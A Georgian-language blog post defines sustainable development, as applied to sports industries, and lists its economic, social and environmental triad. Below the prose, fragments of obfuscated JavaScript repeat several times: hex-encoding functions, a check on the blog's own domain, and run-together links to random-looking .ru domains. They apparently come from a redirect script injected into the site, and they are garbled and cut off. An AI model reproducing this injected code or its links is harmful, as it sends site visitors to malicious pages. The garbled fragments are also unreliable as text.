სპორტული ინდუსტრიებიც, როგორც დანარჩენი ინდუსტრიები, უნდა იყვნენ ჩართულნი მდგრად განვითარებაში. რა არის ეს მდგრადი განვითარება?

ესაა ისეთი განვითარება, რომელიც პასუხობს თანამედროვე მოთხოვნებს მომავალი თაობების ინტერესების შეულახავად. სხვა სიტყვებით, მდგრადობის ცნება გულისხმობს იმას, რომ არაფერმა, რაც დღეს გაკეთდება, (თუნდაც სპორტულმა ინდუსტრიებმა) არ უნდა ავნოს მომავალ თაობებს. იგი გულისხმობს ადამიანთა ისეთ საწარმოო საქმიანობას, ცხოვრებისა და საქმიანობის ისეთ რეჟიმს, რომელიც, ერთის მხრივ, აუმჯობესებს მის მატერიალურ მდგომარეობას და, მეორეს მხრივ, არ უქმნის საფრთხეს მომავალი თაობის არსებობასა და კეთილდღეობას. (ბრუკლინი)

 

მდგრადობის ტრიადა კი ასეთია: ეკონომიკური განვითარება; სოციალური სფერო, კეთილდღეობა;

რაც ნიშნავს – ბუნებრივი გარემო – ჯანსაღი გარემო.

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “ekofact.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

https://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

Advertisements
 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s